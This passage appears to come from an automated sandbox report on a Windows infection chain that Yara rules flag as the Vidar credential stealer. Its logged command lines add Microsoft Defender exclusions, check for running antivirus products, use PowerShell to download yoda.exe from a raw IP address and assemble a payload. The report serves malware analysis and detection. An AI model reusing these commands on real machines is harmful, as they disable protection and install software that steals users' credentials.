Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	01:09:00
Start date:	27/12/2024
Path:	C:\Windows\System32\cacls.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\system32\cacls.exe" "C:\Windows\system32\config\system"
Imagebase:	0x7ff62d920000
File size:	34'304 bytes
MD5 hash:	A353590E06C976809F14906746109758
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	01:09:00
Start date:	27/12/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	PowerShell -ExecutionPolicy Bypass -Command "Set-ExecutionPolicy Unrestricted -Scope Process -Force"
Imagebase:	0x7ff7be880000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	01:09:06
Start date:	27/12/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	PowerShell -Command "Add-MpPreference -ExclusionExtension '.exe'"
Imagebase:	0x7ff7be880000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	01:09:08
Start date:	27/12/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	PowerShell -Command "Add-MpPreference -ExclusionPath '$env:TEMP'"
Imagebase:	0x7ff7be880000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	01:09:10
Start date:	27/12/2024
Path:	C:\Windows\System32\timeout.exe
Wow64 process (32bit):	false
Commandline:	timeout /t 4
Imagebase:	0x7ff77daa0000
File size:	32'768 bytes
MD5 hash:	100065E21CFBBDE57CBA2838921F84D6
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	01:09:14
Start date:	27/12/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	Powershell -Command "Invoke-Webrequest 'http://5.252.155.64/yoda.exe' -OutFile yoda.exe"
Imagebase:	0x7ff7be880000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	01:09:18
Start date:	27/12/2024
Path:	C:\Users\user\AppData\Local\Temp\yoda.exe
Wow64 process (32bit):	true
Commandline:	yoda.exe
Imagebase:	0x7ff6d64d0000
File size:	853'528 bytes
MD5 hash:	79884836C406AE143BC31AEADFA81E70
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 55%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	01:09:19
Start date:	27/12/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\cmd.exe" /c copy Throat Throat.cmd & Throat.cmd
Imagebase:	0x790000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	01:09:19
Start date:	27/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	01:09:20
Start date:	27/12/2024
Path:	C:\Windows\SysWOW64\tasklist.exe
Wow64 process (32bit):	true
Commandline:	tasklist
Imagebase:	0x280000
File size:	79'360 bytes
MD5 hash:	0A4448B31CE7F83CB7691A2657F330F1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	01:09:20
Start date:	27/12/2024
Path:	C:\Windows\SysWOW64\findstr.exe
Wow64 process (32bit):	true
Commandline:	findstr /I "opssvc wrsa"
Imagebase:	0x20000
File size:	29'696 bytes
MD5 hash:	F1D4BE0E99EC734376FDE474A8D4EA3E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	01:09:21
Start date:	27/12/2024
Path:	C:\Windows\SysWOW64\tasklist.exe
Wow64 process (32bit):	true
Commandline:	tasklist
Imagebase:	0x280000
File size:	79'360 bytes
MD5 hash:	0A4448B31CE7F83CB7691A2657F330F1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	01:09:21
Start date:	27/12/2024
Path:	C:\Windows\SysWOW64\findstr.exe
Wow64 process (32bit):	true
Commandline:	findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
Imagebase:	0x20000
File size:	29'696 bytes
MD5 hash:	F1D4BE0E99EC734376FDE474A8D4EA3E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	01:09:22
Start date:	27/12/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd /c md 314782
Imagebase:	0x790000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	01:09:22
Start date:	27/12/2024
Path:	C:\Windows\SysWOW64\findstr.exe
Wow64 process (32bit):	true
Commandline:	findstr /V "INSPIRED" Interview
Imagebase:	0x20000
File size:	29'696 bytes
MD5 hash:	F1D4BE0E99EC734376FDE474A8D4EA3E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	20
Start time:	01:09:22
Start date:	27/12/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd /c copy /b ..\Qualifications + ..\Iso + ..\Processor + ..\Luther A
Imagebase:	0x790000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	21
Start time:	01:09:22
Start date:	27/12/2024
Path:	C:\Users\user\AppData\Local\Temp\314782\Iceland.com
Wow64 process (32bit):	true
Commandline:	Iceland.com A
Imagebase:	0x910000
File size:	947'288 bytes
MD5 hash:	62D09F076E6E0240548C2F837536A46A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000015.00000002.3337432353.0000000003FF0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000015.00000003.2446949939.000000000171B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000015.00000002.3335415004.000000000177F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000015.00000002.3335415004.000000000177F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000015.00000003.2446545610.00000000016F7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000015.00000003.2446576253.0000000004015000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000015.00000002.3341880599.00000000042F1000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000015.00000003.2446692096.00000000042F3000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 0%, ReversingLabs
Has exited:	false

Show Windows behavior

Target ID:	22
Start time:	01:09:22
Start date:	27/12/2024
Path:	C:\Windows\SysWOW64\choice.exe
Wow64 process (32bit):	true
Commandline:	choice /d y /t 5
Imagebase:	0x370000
File size:	28'160 bytes
MD5 hash:	FCE0E41C87DC4ABBE976998AD26C27E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	24
Start time:	01:09:55
Start date:	27/12/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
Imagebase:	0x7ff715980000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	25
Start time:	01:09:56
Start date:	27/12/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Imagebase:	0x7ff7e52b0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	26
Start time:	01:09:56
Start date:	27/12/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2368 --field-trial-handle=2316,i,16410334489771861584,14253994741455031161,262144 /prefetch:8
Imagebase:	0x7ff715980000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	28
Start time:	01:10:09
Start date:	27/12/2024
Path:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
Imagebase:	0x7ff6c1cf0000
File size:	4'210'216 bytes
MD5 hash:	69222B8101B0601CC6663F8381E7E00F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	29
Start time:	01:10:10
Start date:	27/12/2024
Path:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory=Default --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate
Imagebase:	0x7ff6c1cf0000
File size:	4'210'216 bytes
MD5 hash:	69222B8101B0601CC6663F8381E7E00F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	30
Start time:	01:10:10
Start date:	27/12/2024
Path:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2708 --field-trial-handle=2368,i,6727333720448355785,14806548561712805577,262144 /prefetch:3
Imagebase:	0x7ff6c1cf0000
File size:	4'210'216 bytes
MD5 hash:	69222B8101B0601CC6663F8381E7E00F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	31
Start time:	01:10:11
Start date:	27/12/2024
Path:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2052 --field-trial-handle=2072,i,3852677470935874424,11790691988476630425,262144 /prefetch:3
Imagebase:	0x7ff6c1cf0000
File size:	4'210'216 bytes
MD5 hash:	69222B8101B0601CC6663F8381E7E00F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	32
Start time:	01:10:20
Start date:	27/12/2024
Path:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
Imagebase:	0x7ff6c1cf0000
File size:	4'210'216 bytes
MD5 hash:	69222B8101B0601CC6663F8381E7E00F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	33
Start time:	01:10:21
Start date:	27/12/2024
Path:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory=Default --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate
Imagebase:	0x7ff6c1cf0000
File size:	4'210'216 bytes
MD5 hash:	69222B8101B0601CC6663F8381E7E00F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	34
Start time:	01:10:21
Start date:	27/12/2024
Path:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2676 --field-trial-handle=2580,i,8334093384874022839,11229385181323441038,262144 /prefetch:3
Imagebase:	0x7ff6c1cf0000
File size:	4'210'216 bytes
MD5 hash:	69222B8101B0601CC6663F8381E7E00F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	35
Start time:	01:10:21
Start date:	27/12/2024
Path:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2084 --field-trial-handle=1980,i,17978194118169702811,13122044973761353622,262144 /prefetch:3
Imagebase:	0x7ff6c1cf0000
File size:	4'210'216 bytes
MD5 hash:	69222B8101B0601CC6663F8381E7E00F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	36
Start time:	01:10:30
Start date:	27/12/2024
Path:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
Imagebase:	0x7ff6c1cf0000
File size:	4'210'216 bytes
MD5 hash:	69222B8101B0601CC6663F8381E7E00F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	37
Start time:	01:10:30
Start date:	27/12/2024
Path:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory=Default --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate
Imagebase:	0x7ff6c1cf0000
File size:	4'210'216 bytes
MD5 hash:	69222B8101B0601CC6663F8381E7E00F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	38
Start time:	01:10:30
Start date:	27/12/2024
Path:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2660 --field-trial-handle=2308,i,4857392273965620054,3048248773784567787,262144 /prefetch:3
Imagebase:	0x7ff6c1cf0000
File size:	4'210'216 bytes
MD5 hash:	69222B8101B0601CC6663F8381E7E00F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	39
Start time:	01:10:31
Start date:	27/12/2024
Path:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2796 --field-trial-handle=2092,i,8055557621912514682,17074701183551998572,262144 /prefetch:3
Imagebase:	0x7ff6c1cf0000
File size:	4'210'216 bytes
MD5 hash:	69222B8101B0601CC6663F8381E7E00F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	44
Start time:	01:10:35
Start date:	27/12/2024
Path:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6884 --field-trial-handle=2092,i,8055557621912514682,17074701183551998572,262144 /prefetch:8
Imagebase:	0x7ff6c1cf0000
File size:	4'210'216 bytes
MD5 hash:	69222B8101B0601CC6663F8381E7E00F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	45
Start time:	01:10:35
Start date:	27/12/2024
Path:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=7036 --field-trial-handle=2092,i,8055557621912514682,17074701183551998572,262144 /prefetch:8
Imagebase:	0x7ff6c1cf0000
File size:	4'210'216 bytes
MD5 hash:	69222B8101B0601CC6663F8381E7E00F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Function 00007FF848F333B5 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2131393518.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff848f30000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3e8110072008822f9b851662dbd92c3d0a0b45f8918f2b52d7721439382d7d88
Instruction ID: 1fde1e7c06bd8ad01fde8fdacf519f27676798cf7977af127a8e772823c5939c
Opcode Fuzzy Hash: 3e8110072008822f9b851662dbd92c3d0a0b45f8918f2b52d7721439382d7d88
Instruction Fuzzy Hash: 9501677111CB0C4FD744EF0CE451AA5B7E0FB95364F10056EE58AC3695DB36E882CB45

Analysis Process: yoda.exePID: 4980, Parent PID: 6600COMMON

Execution Graph

Execution Coverage:	17.4%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	21%
Total number of Nodes:	1482
Total number of Limit Nodes:	25

Executed Functions

Function 004050F9 Relevance: 66.8, APIs: 36, Strings: 2, Instructions: 295
windowclipboardmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetDlgItem.USER32 ref: 0040515B
GetDlgItem.USER32 ref: 0040516A
GetClientRect.USER32(?,?), ref: 004051C2
GetSystemMetrics.USER32 ref: 004051CA
SendMessageW.USER32(?,00001061,00000000,00000002), ref: 004051EB
SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004051FC
SendMessageW.USER32(?,00001001,00000000,00000110), ref: 0040520F
SendMessageW.USER32(?,00001026,00000000,00000110), ref: 0040521D
SendMessageW.USER32(?,00001024,00000000,?), ref: 00405230
ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405252
ShowWindow.USER32(?,00000008), ref: 00405266
GetDlgItem.USER32 ref: 00405287
SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405297
SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004052AC
SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004052B8
GetDlgItem.USER32 ref: 00405179

Part of subcall function 00403DC4: SendMessageW.USER32(00000028,?,00000001,004057E0), ref: 00403DD2

Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00427176,759223A0,00000000), ref: 00406902

Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3

GetDlgItem.USER32 ref: 004052D7
CreateThread.KERNELBASE ref: 004052E5
CloseHandle.KERNELBASE(00000000), ref: 004052EC
ShowWindow.USER32(00000000), ref: 00405313
ShowWindow.USER32(?,00000008), ref: 00405318
ShowWindow.USER32(00000008), ref: 0040535F
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405391
CreatePopupMenu.USER32 ref: 004053A2
AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 004053B7
GetWindowRect.USER32(?,?), ref: 004053CA
TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004053EC
SendMessageW.USER32(?,00001073,00000000,?), ref: 00405427
OpenClipboard.USER32 ref: 00405437
EmptyClipboard.USER32(?,?,00000000,?,00000000), ref: 0040543D
GlobalAlloc.KERNEL32(00000042,00000000,?,?,00000000,?,00000000), ref: 00405449
GlobalLock.KERNEL32 ref: 00405453
SendMessageW.USER32(?,00001073,00000000,?), ref: 00405467
GlobalUnlock.KERNEL32 ref: 00405489
SetClipboardData.USER32 ref: 00405494
CloseClipboard.USER32(?,?,00000000,?,00000000), ref: 0040549A

Strings

{, xrefs: 0040537E
New install of "%s" to "%s", xrefs: 004051AE

Memory Dump Source

Source File: 0000000B.00000002.2267994392.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.2267948889.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268037420.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268081261.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268081261.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268081261.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268081261.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268270845.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_yoda.jbxd

Similarity

API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlockVersionlstrlenwvsprintf
String ID: New install of "%s" to "%s"${
API String ID: 2110491804-1641061399
Opcode ID: 27dd6abe78b25364254968db719b86f88dfe8c12dd5559a56974b496927f2e5b
Instruction ID: db3ff0878cedf1d1b3e6f9985675ba3e3c8e3ad145c0decdf5c07b0ce3ef5d1a
Opcode Fuzzy Hash: 27dd6abe78b25364254968db719b86f88dfe8c12dd5559a56974b496927f2e5b
Instruction Fuzzy Hash: 46B15970900609BFEB11AFA1DD89EAE7B79FB04354F00803AFA05BA1A1C7755E81DF58

Function 004038AF Relevance: 52.8, APIs: 22, Strings: 8, Instructions: 304
filestringcomCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

#17.COMCTL32 ref: 004038CE
SetErrorMode.KERNELBASE(00008001), ref: 004038D9
OleInitialize.OLE32(00000000), ref: 004038E0

Part of subcall function 00406328: GetModuleHandleA.KERNEL32(?,?,00000020,004038F2,00000008), ref: 00406336
Part of subcall function 00406328: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038F2,00000008), ref: 00406341
Part of subcall function 00406328: GetProcAddress.KERNEL32(00000000), ref: 00406353

SHGetFileInfoW.SHELL32(0040A264,00000000,?,000002B4,00000000), ref: 00403908

Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042

GetCommandLineW.KERNEL32(00476AA0,NSIS Error), ref: 0040391D
GetModuleHandleW.KERNEL32(00000000,004CF0A0,00000000), ref: 00403930
CharNextW.USER32(00000000,004CF0A0,00000020), ref: 00403957
GetTempPathW.KERNEL32(00002004,004E30C8,00000000,00000020), ref: 00403A2C
GetWindowsDirectoryW.KERNEL32(004E30C8,00001FFF), ref: 00403A41
lstrcatW.KERNEL32(004E30C8,\Temp), ref: 00403A4D
DeleteFileW.KERNELBASE(004DF0C0), ref: 00403A64
CoUninitialize.COMBASE(?), ref: 00403AFD
ExitProcess.KERNEL32 ref: 00403B1D
lstrcatW.KERNEL32(004E30C8,~nsu.tmp), ref: 00403B29
lstrcmpiW.KERNEL32(004E30C8,004DB0B8,004E30C8,~nsu.tmp), ref: 00403B35
CreateDirectoryW.KERNEL32(004E30C8,00000000), ref: 00403B41
SetCurrentDirectoryW.KERNEL32(004E30C8), ref: 00403B48
DeleteFileW.KERNEL32(0043DD40,0043DD40,?,00483008,0040A204,0047F000,?), ref: 00403B99
CopyFileW.KERNEL32(004EB0D8,0043DD40,00000001), ref: 00403BAD
CloseHandle.KERNEL32(00000000,0043DD40,0043DD40,?,0043DD40,00000000), ref: 00403BDA
GetCurrentProcess.KERNEL32(00000028,00000005,00000005,00000004,00000003), ref: 00403C30
ExitWindowsEx.USER32(00000002,00000000), ref: 00403C6C

Strings

SeShutdownPrivilege, xrefs: 00403C42
NSIS Error, xrefs: 0040390E
~nsu.tmp, xrefs: 00403B23
\Temp, xrefs: 00403A47
_?=, xrefs: 00403A90
Error launching installer, xrefs: 00403AA9
NCRC, xrefs: 004039A8
/D=, xrefs: 004039D2

Memory Dump Source

Source File: 0000000B.00000002.2267994392.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.2267948889.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268037420.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268081261.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268081261.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268081261.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268081261.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268270845.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_yoda.jbxd

Similarity

API ID: File$DirectoryHandle$CurrentDeleteExitModuleProcessWindowslstrcat$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextPathProcTempUninitializelstrcmpilstrcpyn
String ID: /D=$ _?=$Error launching installer$NCRC$NSIS Error$SeShutdownPrivilege$\Temp$~nsu.tmp
API String ID: 2435955865-3712954417
Opcode ID: aec89c4631a4f28101b36bf3f0ee1ca0be396cf3d13a1cbdd2f96bcbf360b5e4
Instruction ID: 6e3717b9be2730fff72f59090edb21b77de3e5055cb75e9aafb2752c1f1d7b94
Opcode Fuzzy Hash: aec89c4631a4f28101b36bf3f0ee1ca0be396cf3d13a1cbdd2f96bcbf360b5e4
Instruction Fuzzy Hash: 1DA1E6715443117AD720BF629C4AE1B7EACAB0470AF10443FF545B62D2D7BD8A448BAE

